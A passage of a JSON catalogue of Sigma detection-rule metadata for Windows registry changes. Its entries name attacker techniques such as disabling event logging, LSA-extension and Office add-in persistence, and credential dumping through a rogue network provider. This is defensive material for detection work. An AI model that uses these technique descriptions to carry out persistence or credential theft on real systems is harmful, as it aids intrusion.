- "attack.t1562.002"
- ],
- "creation_date": "2022/07/04",
- "filename": "registry_set_disable_winevt_logging.yml",
- "author": "frack113, Nasreddine Bencherchali",
- "level": "high",
- "falsepositive": [
- "Legitimate administrators disabling specific event log for troubleshooting"
- ],
- "logsource.category": "registry_set",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detect set DisallowRun to 1 to prevent user running specific computer program",
- "uuid": "275641a5-a492-45e2-a817-7c81e9d9d3e9",
- "value": "Add DisallowRun Execution to Registry",
- "meta": {
- 
"refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disallowrun_execution.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ], - "creation_date": "2022/08/19", - "filename": "registry_set_disallowrun_execution.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence via autorun.\nThe disk cleanup manager is part of the operating system.\nIt displays the dialog box [\u2026] The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI.\nAlthough Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications.\nInstead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler.\nAny developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.\n", - "uuid": "d4e2745c-f0c6-4bde-a3ab-b553b3f693cc", - "value": "Persistence Via Disk Cleanup Handler - Autorun", - "meta": { - "refs": [ - "https://persistence-info.github.io/Data/diskcleanuphandler.html", - "https://www.hexacorn.com/blog/2018/09/02/beyond-good-ol-run-key-part-86/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disk_cleanup_handler_autorun_persistence.yml" - ], - "tags": [ - "attack.persistence" - ], - "creation_date": "2022/07/21", - "filename": "registry_set_disk_cleanup_handler_autorun_persistence.yml", - "author": "Nasreddine Bencherchali", - 
"level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects when a user enables DNS-over-HTTPS.\nThis can be used to hide internet activity or be used to hide the process of exfiltrating data.\nWith this enabled organization will lose visibility into data such as query type, response and originating IP that are used to determine bad actors.\n", - "uuid": "04b45a8a-d11d-49e4-9acc-4a1b524407a5", - "value": "DNS-over-HTTPS Enabled by Registry", - "meta": { - "refs": [ - "https://www.tenforums.com/tutorials/151318-how-enable-disable-dns-over-https-doh-microsoft-edge.html", - "https://github.com/elastic/detection-rules/issues/1371", - "https://chromeenterprise.google/policies/?policy=DnsOverHttpsMode", - "https://admx.help/HKLM/Software/Policies/Mozilla/Firefox/DNSOverHTTPS", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dns_over_https_enabled.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1140", - "attack.t1112" - ], - "creation_date": "2021/07/22", - "filename": "registry_set_dns_over_https_enabled.yml", - "author": "Austin Songer", - "level": "medium", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects the installation of a plugin DLL via ServerLevelPluginDll parameter in Registry, which can be used to execute code in context of the DNS server (restart required)", - "uuid": "e61e8a88-59a9-451c-874e-70fcc9740d67", - "value": "DNS ServerLevelPluginDll Install - Registry", - "meta": { - "refs": [ - "https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dns_serverlevelplugindll.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1574.002", - 
"attack.t1112" - ], - "creation_date": "2017/05/08", - "filename": "registry_set_dns_serverlevelplugindll.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "This rule detects cor_enable_profiling and cor_profiler environment variables being set and configured.", - "uuid": "ad89044a-8f49-4673-9a55-cbd88a1b374f", - "value": "Enabling COR Profiler Environment Variables", - "meta": { - "refs": [ - "https://twitter.com/jamieantisocial/status/1304520651248668673", - "https://www.slideshare.net/JamieWilliams130/started-from-the-bottom-exploiting-data-sources-to-uncover-attck-behaviors", - "https://www.sans.org/cyber-security-summit/archives", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_enabling_cor_profiler_env_variables.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1574.012" - ], - "creation_date": "2020/09/10", - "filename": "registry_set_enabling_cor_profiler_env_variables.yml", - "author": "Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research)", - "level": "high", - "falsepositive": "No established falsepositives", - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects enabling TurnOffCheck which can be used to bypass defense of MSDT Follina vulnerability", - "uuid": "7d995e63-ec83-4aa3-89d5-8a17b5c87c86", - "value": "Scripted Diagnostics Turn Off Check Enabled - Registry", - "meta": { - "refs": [ - "https://twitter.com/wdormann/status/1537075968568877057?s=20&t=0lr18OAnmAGoGpma6grLUw", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_enabling_turnoffcheck.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2022/06/15", - "filename": 
"registry_set_enabling_turnoffcheck.yml", - "author": "Christopher Peacock @securepeacock, SCYTHE @scythe_io", - "level": "medium", - "falsepositive": [ - "Administrator actions" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Potential adversaries stopping ETW providers recording loaded .NET assemblies.", - "uuid": "bf4fc428-dcc3-4bbd-99fe-2422aeee2544", - "value": "COMPlus_ETWEnabled Registry Modification - Registry", - "meta": { - "refs": [ - "https://twitter.com/_xpn_/status/1268712093928378368", - "https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr", - "https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables", - "https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38", - "https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39", - "https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_", - "https://bunnyinside.com/?term=f71e8cb9c76a", - "http://managed670.rssing.com/chan-5590147/all_p1.html", - "https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_etw_disabled.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ], - "creation_date": "2020/06/05", - "filename": "registry_set_etw_disabled.yml", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects 
applications being added to the \"allowed applications\" list of exploit guard in order to bypass controlled folder settings",
- "uuid": "42205c73-75c8-4a63-9db1-e3782e06fda0",
- "value": "Suspicious Application Allowed Through Exploit Guard",
- "meta": {
- "refs": [
- "https://www.microsoft.com/security/blog/2017/10/23/windows-defender-exploit-guard-reduce-the-attack-surface-against-next-generation-malware/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_exploit_guard_susp_allowed_apps.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1562.001"
- ],
- "creation_date": "2022/08/05",
- "filename": "registry_set_exploit_guard_susp_allowed_apps.yml",
- "author": "Nasreddine Bencherchali",
- "level": "high",
- "falsepositive": [
- "Unlikely"
- ],
- "logsource.category": "registry_set",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detect change of the user account associated with the FAX service to avoid the escalation problem.",
- "uuid": "e3fdf743-f05b-4051-990a-b66919be1743",
- "value": "Change User Account Associated with the FAX Service",
- "meta": {
- "refs": [
- "https://twitter.com/dottor_morte/status/1544652325570191361",
- "https://raw.githubusercontent.com/RiccardoAncarani/talks/master/F-Secure/unorthodox-lateral-movement.pdf",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_fax_change_service_user.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1112"
- ],
- "creation_date": "2022/07/17",
- "filename": "registry_set_fax_change_service_user.yml",
- "author": "frack113",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "registry_set",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detect possible persistence using Fax DLL load when service restart",
- "uuid": "9e3357ba-09d4-4fbd-a7c5-ad6386314513",
- "value": "Change the Fax Dll",
- "meta": {
- "refs": [
- 
"https://twitter.com/dottor_morte/status/1544652325570191361", - "https://raw.githubusercontent.com/RiccardoAncarani/talks/master/F-Secure/unorthodox-lateral-movement.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_fax_dll_persistance.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ], - "creation_date": "2022/07/17", - "filename": "registry_set_fax_dll_persistance.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects the abuse of the exefile handler in new file association. Used for bypass of security products.", - "uuid": "44a22d59-b175-4f13-8c16-cbaef5b581ff", - "value": "New File Association Using Exefile", - "meta": { - "refs": [ - "https://twitter.com/mrd0x/status/1461041276514623491", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_file_association_exefile.yml" - ], - "tags": [ - "attack.defense_evasion" - ], - "creation_date": "2021/11/19", - "filename": "registry_set_file_association_exefile.yml", - "author": "Andreas Hunkeler (@Karneades)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects persistence using GlobalFlags in image file execution options", - "uuid": "36803969-5421-41ec-b92f-8500f79c23b0", - "value": "GlobalFlags Registry Persistence Mechanisms", - "meta": { - "refs": [ - "https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_globalflags_persistence.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.persistence", - "attack.defense_evasion", - "attack.t1546.012", - "car.2013-01-002" - ], - 
"creation_date": "2018/04/11", - "filename": "registry_set_globalflags_persistence.yml", - "author": "Karneades, Jonhnathan Ribeiro", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects when an attacker adds a new \"Debugger\" value to the \"Hangs\" key in order to achieve persistence which will get invoked when an application crashes", - "uuid": "833ef470-fa01-4631-a79b-6f291c9ac498", - "value": "Add Debugger Entry To Hangs Key For Persistence", - "meta": { - "refs": [ - "https://persistence-info.github.io/Data/wer_debugger.html", - "https://www.hexacorn.com/blog/2019/09/20/beyond-good-ol-run-key-part-116/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hangs_debugger_persistence.yml" - ], - "tags": [ - "attack.persistence" - ], - "creation_date": "2022/07/21", - "filename": "registry_set_hangs_debugger_persistence.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "This value is not set by default but could be rarly used by administrators" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects when an attacker modifies the registry value of the \"hhctrl\" to point to a custom binary", - "uuid": "f10ed525-97fe-4fed-be7c-2feecca941b1", - "value": "Persistence Via Hhctrl.ocx", - "meta": { - "refs": [ - "https://persistence-info.github.io/Data/hhctrl.html", - "https://www.hexacorn.com/blog/2018/04/23/beyond-good-ol-run-key-part-77/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hhctrl_persistence.yml" - ], - "tags": [ - "attack.persistence" - ], - "creation_date": "2022/07/21", - "filename": "registry_set_hhctrl_persistence.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": 
"registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Hides the file extension through modification of the registry", - "uuid": "5df86130-4e95-4a54-90f7-26541b40aec2", - "value": "Registry Modification to Hidden File Extension", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-1---modify-registry-of-current-user-profile---cmd", - "https://unit42.paloaltonetworks.com/ransomware-families/", - "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=TrojanSpy%3aMSIL%2fHakey.A", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hidden_extention.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1137" - ], - "creation_date": "2022/01/22", - "filename": "registry_set_hidden_extention.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Administrative scripts" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects modifications to the hidden files keys in registry. 
This technique is abused by several malware families to hide their files from normal users.",
- "uuid": "5a5152f1-463f-436b-b2f5-8eceb3964b42",
- "value": "Modification of Explorer Hidden Keys",
- "meta": {
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md#atomic-test-8---hide-files-through-registry",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hide_file.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1564.001"
- ],
- "creation_date": "2022/04/02",
- "filename": "registry_set_hide_file.yml",
- "author": "frack113",
- "level": "medium",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "registry_set",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects registry modifications that hide internal tools or functions from the user (malware like Agent Tesla, Hermetic Wiper uses this technique)",
- "uuid": "5a93eb65-dffa-4543-b761-94aa60098fb6",
- "value": "Registry Hide Function from User",
- "meta": {
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hide_function_user.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1112"
- ],
- "creation_date": "2022/03/18",
- "filename": "registry_set_hide_function_user.yml",
- "author": "frack113",
- "level": "medium",
- "falsepositive": [
- "Legitimate admin script"
- ],
- "logsource.category": "registry_set",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects when the \"index\" value of a scheduled task is modified from the registry\nWhich effectively hides it from any tooling such as \"schtasks /query\" (Read the referenced link for more information about the effects of this technique)\n",
- "uuid": 
"5b16df71-8615-4f7f-ac9b-6c43c0509e61", - "value": "Hide Schedule Task Via Index Value Tamper", - "meta": { - "refs": [ - "https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hide_scheduled_task_via_index_tamper.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562" - ], - "creation_date": "2022/08/26", - "filename": "registry_set_hide_scheduled_task_via_index_tamper.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects the modification of the registry settings used for Internet Explorer and other Windows components that use these settings", - "uuid": "d88d0ab2-e696-4d40-a2ed-9790064e66b3", - "value": "Modification of IE Registry Settings", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-5---javascript-in-registry", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_ie_persistence.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ], - "creation_date": "2022/01/22", - "filename": "registry_set_ie_persistence.yml", - "author": "frack113", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects when an attacker register a new IFilter for an exntesion. Microsoft Windows Search uses filters to extract the content of items for inclusion in a full-text index. 
You can extend Windows Search to index new or proprietary file types by writing filters to extract the content, and property handlers to extract the properties of files",
- "uuid": "b23818c7-e575-4d13-8012-332075ec0a2b",
- "value": "Register New IFiltre For Persistence",
- "meta": {
- "refs": [
- "https://persistence-info.github.io/Data/ifilters.html",
- "https://twitter.com/0gtweet/status/1468548924600459267",
- "https://github.com/gtworek/PSBits/tree/master/IFilter",
- "https://github.com/gtworek/PSBits/blob/8d767892f3b17eefa4d0668f5d2df78e844f01d8/IFilter/Dll.cpp#L281-L308",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_ifilter_persistence.yml"
- ],
- "tags": [
- "attack.persistence"
- ],
- "creation_date": "2022/07/21",
- "filename": "registry_set_ifilter_persistence.yml",
- "author": "Nasreddine Bencherchali",
- "level": "medium",
- "falsepositive": [
- "Legitimate registration of IFilters by the OS or software"
- ],
- "logsource.category": "registry_set",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects the addition of new root, CA or AuthRoot certificates to the Windows registry",
- "uuid": "d223b46b-5621-4037-88fe-fda32eead684",
- "value": "New Root or CA or AuthRoot Certificate to Store",
- "meta": {
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md#atomic-test-6---add-root-certificate-to-currentuser-certificate-store",
- "https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_install_root_or_ca_certificat.yml"
- ],
- "tags": [
- "attack.impact",
- "attack.t1490"
- ],
- "creation_date": "2022/04/04",
- "filename": "registry_set_install_root_or_ca_certificat.yml",
- "author": "frack113",
- "level": "medium",
- "falsepositive": [
- "Unknown"
- ],
- 
"logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects setting a custom URL for OneDriveStandaloneUpdater.exe to download a file from the Internet without executing any\nanomalous executables with suspicious arguments. The downloaded file will be in C:\\Users\\redacted\\AppData\\Local\\Microsoft\\OneDrive\\StandaloneUpdaterreSignInSettingsConfig.json\n", - "uuid": "3aff0be0-7802-4a7e-a4fa-c60c74bc5e1d", - "value": "Lolbas OneDriveStandaloneUpdater.exe Proxy Download", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/OneDriveStandaloneUpdater/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_lolbin_onedrivestandaloneupdater.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1105" - ], - "creation_date": "2022/05/28", - "filename": "registry_set_lolbin_onedrivestandaloneupdater.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects when an attacker modifies the \"REG_MULTI_SZ\" value named \"Extensions\" to include a custom DLL to achieve persistence via lsass.\nThe \"Extensions\" list contains filenames of DLLs being automatically loaded by lsass.exe. 
Each DLL has its InitializeLsaExtension() method called after loading.\n",
- "uuid": "41f6531d-af6e-4c6e-918f-b946f2b85a36",
- "value": "Persistence Via LSA Extensions",
- "meta": {
- "refs": [
- "https://persistence-info.github.io/Data/lsaaextension.html",
- "https://twitter.com/0gtweet/status/1476286368385019906",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_lsa_extension_persistence.yml"
- ],
- "tags": [
- "attack.persistence"
- ],
- "creation_date": "2022/07/21",
- "filename": "registry_set_lsa_extension_persistence.yml",
- "author": "Nasreddine Bencherchali",
- "level": "high",
- "falsepositive": [
- "Unlikely"
- ],
- "logsource.category": "registry_set",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT",
- "uuid": "42f0e038-767e-4b85-9d96-2c6335bad0b5",
- "value": "Adwind RAT / JRAT - Registry",
- "meta": {
- "refs": [
- "https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100",
- "https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_mal_adwind.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1059.005",
- "attack.t1059.007"
- ],
- "creation_date": "2017/11/10",
- "filename": "registry_set_mal_adwind.yml",
- "author": "Florian Roth, Tom Ueltschi, Jonhnathan Ribeiro, oscd.community",
- "level": "high",
- "falsepositive": "No established falsepositives",
- "logsource.category": "registry_set",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Attempts to detect system changes made by Blue Mockingbird",
- "uuid": "92b0b372-a939-44ed-a11b-5136cf680e27",
- "value": "Blue Mockingbird - Registry",
- "meta": {
- "refs": [
- "https://redcanary.com/blog/blue-mockingbird-cryptominer/",
- 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_mal_blue_mockingbird.yml" - ], - "tags": [ - "attack.execution", - "attack.t1112", - "attack.t1047" - ], - "creation_date": "2020/05/14", - "filename": "registry_set_mal_blue_mockingbird.yml", - "author": "Trent Liffick (@tliffick)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects when an attacker register a new SIP provider for persistence and defense evasion", - "uuid": "92772523-d9c1-4c93-9547-b0ca500baba3", - "value": "Persistence Via Mpnotify", - "meta": { - "refs": [ - "https://persistence-info.github.io/Data/mpnotify.html", - "https://www.youtube.com/watch?v=ggY3srD9dYs&ab_channel=GrzegorzTworek", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_mpnotify_persistence.yml" - ], - "tags": [ - "attack.persistence" - ], - "creation_date": "2022/07/21", - "filename": "registry_set_mpnotify_persistence.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Might trigger if a legitimate new SIP provider is registered. But this is not a common occurrence in an environment and should be investigated either way" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects changes to the NGenAssemblyUsageLog registry key.\n.NET Usage Log output location can be controlled by setting the NGenAssemblyUsageLog CLR configuration knob in the Registry or by configuring an environment variable (as described in the next section).\nBy simplify specifying an arbitrary value (e.g. 
fake output location or junk data) for the expected value, a Usage Log file for the .NET execution context will not be created.\n", - "uuid": "28036918-04d3-423d-91c0-55ecf99fb892", - "value": "NET NGenAssemblyUsageLog Registry Key Tamper", - "meta": { - "refs": [ - "https://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_net_cli_ngenassemblyusagelog.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ], - "creation_date": "2022/11/18", - "filename": "registry_set_net_cli_ngenassemblyusagelog.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "A General detection for a new application in AppCompat. This indicates an application executing for the first time on an endpoint.", - "uuid": "60936b49-fca0-4f32-993d-7415edcf9a5d", - "value": "New Application in AppCompat", - "meta": { - "refs": [ - "https://github.com/OTRF/detection-hackathon-apt29/issues/1", - "https://threathunterplaybook.com/evals/apt29/detections/1.A.1_DFD6A782-9BDB-4550-AB6B-525E825B095E.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_new_application_appcompat.yml" - ], - "tags": [ - "attack.execution", - "attack.t1204.002" - ], - "creation_date": "2020/05/02", - "filename": "registry_set_new_application_appcompat.yml", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "level": "informational", - "falsepositive": [ - "This rule is to explore new applications on an endpoint. False positives depends on the organization.", - "Newly setup system.", - "Legitimate installation of new application." 
- ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it", - "uuid": "0442defa-b4a2-41c9-ae2c-ea7042fc4701", - "value": "New Network Provider - Registry", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/network-provider-settings-removed-in-place-upgrade", - "https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_new_network_provider.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003" - ], - "creation_date": "2022/08/23", - "filename": "registry_set_new_network_provider.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Other legitimate network providers used and not filtred in this rule" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Enable Dynamic Data Exchange protocol (DDE) in all supported editions of Microsoft Word or Excel.", - "uuid": "63647769-326d-4dde-a419-b925cc0caf42", - "value": "Enable Microsoft Dynamic Data Exchange", - "meta": { - "refs": [ - "https://msrc.microsoft.com/update-guide/vulnerability/ADV170021", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_enable_dde.yml" - ], - "tags": [ - "attack.execution", - "attack.t1559.002" - ], - "creation_date": "2022/02/26", - "filename": "registry_set_office_enable_dde.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects registry changes to Office macro settings. The TrustRecords contain information on executed macro-enabled documents. 
(see references)", - "uuid": "a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd", - "value": "Office Security Settings Changed", - "meta": { - "refs": [ - "https://twitter.com/inversecos/status/1494174785621819397", - "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/", - "https://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_security.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ], - "creation_date": "2020/05/22", - "filename": "registry_set_office_security.yml", - "author": "Trent Liffick (@tliffick)", - "level": "high", - "falsepositive": [ - "Valid Macros and/or internal documents" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects persistence via Visual Studio Tools for Office (VSTO) add-ins in Office applications.", - "uuid": "9d15044a-7cfe-4d23-8085-6ebc11df7685", - "value": "Stealthy VSTO Persistence", - "meta": { - "refs": [ - "https://twitter.com/_vivami/status/1347925307643355138", - "https://vanmieghem.io/stealth-outlook-persistence/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_vsto_persistence.yml" - ], - "tags": [ - "attack.t1137.006", - "attack.persistence" - ], - "creation_date": "2021/01/10", - "filename": "registry_set_office_vsto_persistence.yml", - "author": "Bhabesh Raj", - "level": "medium", - "falsepositive": [ - "Legitimate Addin Installation" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects the modification of Outlook Security Setting to allow unprompted execution. 
Goes with win_outlook_c2_macro_creation.yml and is particularly interesting if both events occur near to each other.", - "uuid": "e3b50fa5-3c3f-444e-937b-0a99d33731cd", - "value": "Outlook C2 Registry Key", - "meta": { - "refs": [ - "https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_outlook_c2_registry_key.yml" - ], - "tags": [ - "attack.persistence", - "attack.command_and_control", - "attack.t1137", - "attack.t1008", - "attack.t1546" - ], - "creation_date": "2021/04/05", - "filename": "registry_set_outlook_c2_registry_key.yml", - "author": "@ScoubiMtl", - "level": "medium", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects the manipulation of persistent URLs which could execute malicious code", - "uuid": "487bb375-12ef-41f6-baae-c6a1572b4dd1", - "value": "Persistent Outlook Landing Today Pages", - "meta": { - "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=70", - 